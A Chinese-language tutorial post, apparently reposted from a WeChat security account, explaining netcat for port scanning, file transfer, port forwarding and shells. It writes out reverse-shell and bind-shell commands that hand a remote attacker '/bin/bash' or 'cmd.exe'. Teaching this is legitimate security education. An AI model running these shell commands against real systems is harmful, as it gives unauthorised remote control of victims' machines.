网络安全界的瑞士军刀之netcat工具使用

admin 2025年5月15日17:58:52评论1 views字数 983阅读3分16秒阅读模式
网络安全界的瑞士军刀之netcat工具使用

点击蓝字

关注我们

网络安全界的瑞士军刀之netcat工具使用

始于理论,源于实践,终于实战

老付话安全,每天一点点

激情永无限,进步看得见

网络安全界的瑞士军刀之netcat工具使用

严正声明

本号所写文章方法和工具只用于学习和交流,严禁使用文章所述内容中的方法未经许可的情况下对生产系统进行方法验证实施,发生一切问题由相关个人承担法律责任,其与本号无关。

特此声明!!!

Netcat(简称 nc)是一个功能强大的 命令行网络工具,linux发行版都支持,window版可以使用namp自带的nc。

nc分为客户端模式:主动连接到指定主机和端口,之后所有键盘输入都会发送到远程主机

服务器模式:监听指定端口等待连接,功能与客户端模式类似。

nc可以干什么?

端口扫描:检测目标主机的开放端口(类似 nmap)

文件传输:在两台机器之间传输文件

  • 接收方 nc -l -p 端口 > file 将收到的数据写入文件。

  • 发送方 nc IP 端口 < file 读取文件并发送。

端口转发:将流量从一个端口转发到另一个端口,

  • 本地端口转发:将本地某个端口的流量转发到远程主机的指定端口。它能够绕过防火墙限制或访问不可达的远程服务。

  • 远程端口转发:将远程主机的某个端口流量转发到本地服务。暴露本地服务到远程可访问的地址。

  • 例如nc -l -p  8080 | nc 192.168.1.1 80
    此命令将本地端口 8080 的流量转发到目标主机 192.168.1.1 上的 80 端口。

反弹 Shell:建立远程控制连接,(受害者主动连接攻击者,并绑定自己的 Shell(/bin/bash 或 cmd.exe)。攻击者获得交互式 Shell,可远程控制受害者。)

攻击者(监听):nc -lvnp 4444

  • 受害者(反弹 Shell):

    nc 10.0.0.1 4444 -e /bin/bash

    (Windows 可用 -e cmd.exe)

  • 例如,

  • 目标机器上:nc -lvp 4444 -e /bin/bash

  • 攻击者机器上:nc 192.168.1.2 4444
    这会建立一个反向 shell 连接,让攻击者可以控制目标机器的 shell。

正向shell:攻击者直连目标(需目标主机有公网IP或可达内网IP,易被防火墙拦截(入站连接))

  • 在目标主机(受害机)上执行

  • nc -lvnp 4444 -e /bin/bash  # Linux

  • nc -lvnp 4444 -e cmd.exe    # Windows

  • 攻击者:nc 目标(受害者)IP    4444

END

原文始发于微信公众号(老付话安全):网络安全界的“瑞士军刀之netcat工具使用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月15日17:58:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网络安全界的瑞士军刀之netcat工具使用https://cn-sec.com/archives/4048506.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息